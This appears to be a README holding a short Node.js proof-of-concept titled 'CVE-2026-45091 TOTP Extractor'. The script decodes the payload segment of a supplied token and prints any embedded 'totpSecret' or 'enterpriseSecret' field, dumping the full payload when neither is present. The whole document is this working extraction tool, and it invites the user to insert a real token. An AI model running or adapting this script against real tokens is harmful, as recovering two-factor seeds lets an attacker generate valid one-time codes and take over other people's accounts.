README.md
Rendering markdown...
// extract-totp.js
const token = "...your.token.here..."; // ← Replace with your real token
// Main logic
const payloadB64 = token.split('.')[1];
if (!payloadB64) {
console.error("❌ Invalid token format");
process.exit(1);
}
try {
// Decode base64url payload
const payload = JSON.parse(
Buffer.from(payloadB64, 'base64url').toString('utf8')
);
// Extract secret
const totpSecret = payload.totpSecret || payload.enterpriseSecret;
console.log("=== CVE-2026-45091 TOTP Extractor ===");
if (totpSecret) {
console.log("✅ TOTP Secret Found:");
console.log(totpSecret);
} else {
console.log("❌ No totpSecret or enterpriseSecret found in payload.");
console.log("Full payload:", payload);
}
} catch (err) {
console.error("❌ Error decoding token:", err.message);
}